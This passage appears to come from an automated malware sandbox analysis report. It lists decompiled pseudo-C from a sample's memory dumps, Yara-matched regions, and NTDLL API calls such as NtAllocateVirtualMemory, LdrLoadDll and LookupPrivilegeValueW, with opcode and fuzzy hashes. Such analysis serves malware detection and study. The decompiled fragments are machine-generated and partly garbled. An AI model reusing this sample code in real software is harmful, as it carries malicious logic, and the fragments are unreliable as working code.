                    					 *_t334 =  *_t334 + _t334;
                    					_push(es);
                    					_t180 = _t334 + 0xa -  *((intOrPtr*)(_t334 + 0xa));
                    				}
                    				 *_t180 =  *_t180 + _t180;
                    				 *_t337 =  *_t337 + _t398;
                    				 *_t361 =  *_t361 ^ _t180;
                    				 *_t361 =  *_t361 + _t361;
                    				 *_t180 =  *_t180 + _t180;
                    				 *_t361 =  *_t361 + _t180;
                    				 *_t180 =  *_t180 + _t180;
                    				asm("adc [edx], eax");
                    				if( *_t180 == 0) {
                    					 *_t180 =  *_t180 + _t180;
                    					_push(es);
                    					_t331 = _t180 + 0xa -  *((intOrPtr*)(_t180 + 0xa));
                    					 *_t331 =  *_t331 + _t331;
                    					 *_t337 =  *_t337 - _t361;
                    					 *_t331 =  *_t331 + _t331;
                    					_t332 = _t331 |  *_t398;
                    					_t422 = _t422 +  *((intOrPtr*)(_t431 + 0x22));
                    					 *_t332 =  *_t332 + _t332;
                    					_t180 = _t332 + 0x2a;
                    					 *_t337 =  *_t337 + _t398;
                    					 *_t398 =  *_t398 ^ _t180;
                    					 *_t337 =  *_t337 + _t361;
                    					 *_t180 =  *_t180 + _t180;
                    					 *_t398 =  *_t398 + _t361;
                    				}
                    				_t181 = _t180 |  *_t180;
                    				 *_t361 =  *_t361 + _t398;
                    				_t338 = _t337 + _t337[8];
                    			}
















                    Memory Dump Source
                    • Source File: 00000000.00000002.361815167.00000000004E2000.00000002.00020000.sdmp, Offset: 004E0000, based on PE: true
                    • Associated: 00000000.00000002.361804169.00000000004E0000.00000002.00020000.sdmp
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7161d09a3bdb791401b33f3fcf750a4a94351d79dd6b82abdab7c9f9dba1552e
                    • Instruction ID: 9c723452877666a3b4b4a580fdc880b2efbf04cb8651acd43aed4fdea31f3378
                    • Opcode Fuzzy Hash: 7161d09a3bdb791401b33f3fcf750a4a94351d79dd6b82abdab7c9f9dba1552e
                    • Instruction Fuzzy Hash: 4AA2116240E3C29FCB138B749DB51D1BFB1AE5722472E09CBC4C0CF0A7E258599AD766
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 977b348c0db772e428a628f73a003cd367361c801b80a5c8f74095677a1412fc
                    • Instruction ID: c7fc6ccbb5b4135f887175becf4f6396167f6cc90d226129c0ae50fedbfad849
                    • Opcode Fuzzy Hash: 977b348c0db772e428a628f73a003cd367361c801b80a5c8f74095677a1412fc
                    • Instruction Fuzzy Hash: BD1280BA411F468FE310CF66EC981893BA1F786328B914708D2613AAF2D7B4114FEF45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0a1c7336f449363154775ff4fefd279e5e37f46fea069f3ea7ccc8f48fba7e3f
                    • Instruction ID: 43a9e94203fa25f5221e8ca09dc8a5a19477f8c34ba9cbda46bfce84f313e4c5
                    • Opcode Fuzzy Hash: 0a1c7336f449363154775ff4fefd279e5e37f46fea069f3ea7ccc8f48fba7e3f
                    • Instruction Fuzzy Hash: 45A18F32E006298FCF05DFA5D8449DEB7F2FF89304B25956AE905BB261DB71E905CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3595f3129e5f22e7a5dbd51503c341b597eb11f87485e1dd477be7283ef80472
                    • Instruction ID: 4a53886a6743ba09076352548625b010495c0757c6cd20dbb141913b78fc726d
                    • Opcode Fuzzy Hash: 3595f3129e5f22e7a5dbd51503c341b597eb11f87485e1dd477be7283ef80472
                    • Instruction Fuzzy Hash: C2C106BA811B4A8FD710CF66EC981893BA1FB86328F514709D2613B6E2D7B4144FDF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Executed Functions

                    C-Code - Quality: 37%
                    			E0041A40A(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                    				void* _t20;
                    				void* _t29;
                    				intOrPtr* _t31;
                    				void* _t33;
                    
                    				_t15 = _a4;
                    				_t31 = _a4 + 0xc48;
                    				E0041AF60(_t29, _t15, _t31,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
                    				_t4 =  &_a40; // 0x414a31
                    				_t6 =  &_a32; // 0x414d72
                    				_t12 =  &_a8; // 0x414d72
                    				_t20 =  *((intOrPtr*)( *_t31))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, 0x55c68072, _t33); // executed
                    				return _t20;
                    			}








                    APIs
                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1JA$rMA$rMA
                    • API String ID: 2738559852-782607585
                    • Opcode ID: b0b945ea7ac9c0154c7bd539085f630498a042f42791842d782ade54bdc43549
                    • Instruction ID: ab0f2a686f6ba0e30151440379a14482089342f8888276c55892b2385d88771f
                    • Opcode Fuzzy Hash: b0b945ea7ac9c0154c7bd539085f630498a042f42791842d782ade54bdc43549
                    • Instruction Fuzzy Hash: 7AF0F4B2200108ABCB14DF89DC80EEB77A9EF8C754F158648BE0DA7241C630ED51CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                    				void* _t18;
                    				void* _t27;
                    				intOrPtr* _t28;
                    
                    				_t13 = _a4;
                    				_t28 = _a4 + 0xc48;
                    				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                    				_t4 =  &_a40; // 0x414a31
                    				_t6 =  &_a32; // 0x414d72
                    				_t12 =  &_a8; // 0x414d72
                    				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                    				return _t18;
                    			}







                    APIs
                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1JA$rMA$rMA
                    • API String ID: 2738559852-782607585
                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                    • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                    • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Load
                    • String ID:
                    • API String ID: 2234796835-0
                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                    • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                    • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: 6a87fa68acc742cbafd9a53053ce36e74d75ca4c3e0762fc499327b1afa3e1ac
                    • Instruction ID: 533771b94bd3c33c6fbbac88a19233b85bb76ba884f0643547e4572e5c36d793
                    • Opcode Fuzzy Hash: 6a87fa68acc742cbafd9a53053ce36e74d75ca4c3e0762fc499327b1afa3e1ac
                    • Instruction Fuzzy Hash: 1CF0F2B6210208ABDB18DF89CC81EEB77ADEF88754F158149FA1897241C631E912CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                    • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                    • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                    • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                    • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 13240cbdce3d59d71d7d3b9f1f3b334cfe48e050bec9053a278a5518aac78789
                    • Instruction ID: b76b14c2cb13bbf6f13999c1ac1257d3443ac47ae128eb8dd1f983b92c624ddf
                    • Opcode Fuzzy Hash: 13240cbdce3d59d71d7d3b9f1f3b334cfe48e050bec9053a278a5518aac78789
                    • Instruction Fuzzy Hash: C09002B160100403D180719944447860015E7D0345F51C462A5054555EC7A99DD576B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: a3827461ea15f0bc95f2349577db0f541dc5d63362b1c37825d699e8d8bbe660
                    • Instruction ID: 57f4e4207bf9e8e6f5dcc9f63ce7977354bb346315fd60f2abcff0577c63265d
                    • Opcode Fuzzy Hash: a3827461ea15f0bc95f2349577db0f541dc5d63362b1c37825d699e8d8bbe660
                    • Instruction Fuzzy Hash: 559002A174100443D14061994454B460015E7E1345F51C466E1054555DC769DC527176
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 90a40f507da2f4e7d80de2a973e1773f1076d782c45757793210fb756b760fdc
                    • Instruction ID: d5c3abe8c4696c153ad436a750a98d30a2d44ac010f7d1c8ea71bf6d5e8c172e
                    • Opcode Fuzzy Hash: 90a40f507da2f4e7d80de2a973e1773f1076d782c45757793210fb756b760fdc
                    • Instruction Fuzzy Hash: 63900261642041535585B19944445474016F7E0285791C463A1404951CC676A856E671
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 004ee9886ea51608fdfefecb2d6dc8f34f9c35047673240ad5756e1b8790dc44
                    • Instruction ID: c2213f090dd17dbf840151dbf8f1bc3692236193a31f1a2dabe37912a88a6e7b
                    • Opcode Fuzzy Hash: 004ee9886ea51608fdfefecb2d6dc8f34f9c35047673240ad5756e1b8790dc44
                    • Instruction Fuzzy Hash: 7690027160100413D151619945447470019E7D0285F91C863A0414559DD7A69952B171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 1f3bbb5d8028e32a0ef495b3592c8eafe2fd0165743af232e0885e17ed82c67f
                    • Instruction ID: c1e96bc8ba3ad83a7cc3a4d96e8e08bd78660c11d1b8bdf7d2563e7d4cd38e00
                    • Opcode Fuzzy Hash: 1f3bbb5d8028e32a0ef495b3592c8eafe2fd0165743af232e0885e17ed82c67f
                    • Instruction Fuzzy Hash: 1F900261A0100503D14171994444656001AE7D0285F91C473A1014556ECB759992B171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 70471f52307a6c779971c94288dd5faf5f131584569771f32681f9dc507fca72
                    • Instruction ID: 7ba45445ae6d9f13d9dff87278a3770a3035281045d9f5612494e253fafc5a9b
                    • Opcode Fuzzy Hash: 70471f52307a6c779971c94288dd5faf5f131584569771f32681f9dc507fca72
                    • Instruction Fuzzy Hash: 9290026161180043D24065A94C54B470015E7D0347F51C566A0144555CCA6598616571
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 315b08c4d993a63fa09a9ef1b4cba1901e11ddb03d45c2ca7a15c4ddb3d76a55
                    • Instruction ID: beb098f2da6edbdb55c26cd2edfa20ee85e3bec507828853e202a573ecce8c05
                    • Opcode Fuzzy Hash: 315b08c4d993a63fa09a9ef1b4cba1901e11ddb03d45c2ca7a15c4ddb3d76a55
                    • Instruction Fuzzy Hash: 8390027160140403D1406199485474B0015E7D0346F51C462A1154556DC775985175B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 90cf6b40b872693327868f45df0708b58eae1cc18d10d8e886f2de4681935ecc
                    • Instruction ID: f5fb8f94a1d4cb300f799b95ccb2c9f4f628ddaf8f5df29617762adc6976441e
                    • Opcode Fuzzy Hash: 90cf6b40b872693327868f45df0708b58eae1cc18d10d8e886f2de4681935ecc
                    • Instruction Fuzzy Hash: 38900261A0100043418071A988849464015FBE1255751C572A0988551DC6A9986566B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 0206e25b7dd2b7999cd698a242bf7a662ea165b180ba5964d5c897cbd6b7d9a4
                    • Instruction ID: c01b980787415e6afbe0e589a0932427d78c840e4b9c1098640d7a1078b0e052
                    • Opcode Fuzzy Hash: 0206e25b7dd2b7999cd698a242bf7a662ea165b180ba5964d5c897cbd6b7d9a4
                    • Instruction Fuzzy Hash: D2900475711000030145F5DD07445470057F7D53D5351C473F1005551CD771DC717171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 88119f4641e503804201082c174653255ce18213fd37e1f3a5cfe43821a66b1c
                    • Instruction ID: 2ba0a300c21d9c19ce05cd5cd253059417c21e4ec378044ed1a69ce4f8e80f3d
                    • Opcode Fuzzy Hash: 88119f4641e503804201082c174653255ce18213fd37e1f3a5cfe43821a66b1c
                    • Instruction Fuzzy Hash: 6F9002A160200003414571994454656401AE7E0245B51C472E1004591DC67598917175
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: ef9b041180a8b08cb66387357acedc9a634577621b8363b8991416113b1bc27e
                    • Instruction ID: e87376751dbe1a154128e3e3f2f22526c449c7da700928916044b3664bcd9c89
                    • Opcode Fuzzy Hash: ef9b041180a8b08cb66387357acedc9a634577621b8363b8991416113b1bc27e
                    • Instruction Fuzzy Hash: 9490027160100403D14065D954486860015E7E0345F51D462A5014556EC7B598917171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: c8a07d161868752fbbe61e59c809833f842f7e5247b5a16b282efb47c56ed0ee
                    • Instruction ID: 978f5c06e8395180c2c03fbca7b29cef1157a16cd4a5ed615da83c3f325e847f
                    • Opcode Fuzzy Hash: c8a07d161868752fbbe61e59c809833f842f7e5247b5a16b282efb47c56ed0ee
                    • Instruction Fuzzy Hash: A590026961300003D1C07199544864A0015E7D1246F91D866A0005559CCA6598696371
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: d9604c50ab73d21aea587b76505f543d0dd633afd2b2fad6586b50df85ca9cd4
                    • Instruction ID: cecccc9859f6fcbc6bb8c3a771b8ee1630e6882e7348400edd6d9d36b4cf92d5
                    • Opcode Fuzzy Hash: d9604c50ab73d21aea587b76505f543d0dd633afd2b2fad6586b50df85ca9cd4
                    • Instruction Fuzzy Hash: 7090026170100003D180719954586464015F7E1345F51D462E0404555CDA6598566272
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: d970cc85e8abeecb2addee43a954350a344a747e5c78a04a11e2c72fcdaea944
                    • Instruction ID: cfc07e2c926028fe9bb3d50fc9f7db1d33eb74a7daf0273d0ab8711ac4776bae
                    • Opcode Fuzzy Hash: d970cc85e8abeecb2addee43a954350a344a747e5c78a04a11e2c72fcdaea944
                    • Instruction Fuzzy Hash: 7690027160100803D1C07199444468A0015E7D1345F91C466A0015655DCB659A5977F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7e40b9ae206dab49d2e31738ef7d2dfc1b92160ded1baf9bffbe995be2ec837b
                    • Instruction ID: eefcd787c7df66a6cdac11111f083bb3786f71aca09388d24de24efdb91f3c98
                    • Opcode Fuzzy Hash: 7e40b9ae206dab49d2e31738ef7d2dfc1b92160ded1baf9bffbe995be2ec837b
                    • Instruction Fuzzy Hash: E090027160108803D1506199844478A0015E7D0345F55C862A4414659DC7E598917171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                    • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                    • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                    • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: 6EA
                    • API String ID: 1279760036-1400015478
                    • Opcode ID: a98847f2e252cc0ecf61119c51841db37d5db63ff107d9f4b25a8af0771ef148
                    • Instruction ID: 39720b43df85a4fb1fcfa181b4cfd610112105b72d9cfa92d60ccc77b1d29bf3
                    • Opcode Fuzzy Hash: a98847f2e252cc0ecf61119c51841db37d5db63ff107d9f4b25a8af0771ef148
                    • Instruction Fuzzy Hash: 4C11B1B1200204AFDB14DF98CC85EEB7BACEF88764F188549F95C9B242C531E961CBE0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: 6EA
                    • API String ID: 1279760036-1400015478
                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                    • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                    • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: 5395406210b269f598131eee024416dc26fb76be6e5f910b34b47c189d571564
                    • Instruction ID: 83474eddad65d3c774883c75f756b4244a4566f4715317985112aa5046017eea
                    • Opcode Fuzzy Hash: 5395406210b269f598131eee024416dc26fb76be6e5f910b34b47c189d571564
                    • Instruction Fuzzy Hash: 2101D631A8032877E721A6959D42FFF77686F40B94F04015DFF04BB2C2E6B8690647EA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                    • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                    • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                    • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 8f61b47f61b9228cdbdf73a34ceff9af0da408fbbd3f8b67346220cfb4b57c5b
                    • Instruction ID: a7984e94b4e708b053e011c713a2c9794994ba5b319c447e01f26a3516d4f082
                    • Opcode Fuzzy Hash: 8f61b47f61b9228cdbdf73a34ceff9af0da408fbbd3f8b67346220cfb4b57c5b
                    • Instruction Fuzzy Hash: 83F058B62102086BDB10EF99DC81EEB73A9EF88724F10855AFE0C97241C635E9118BB5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                    • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                    • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
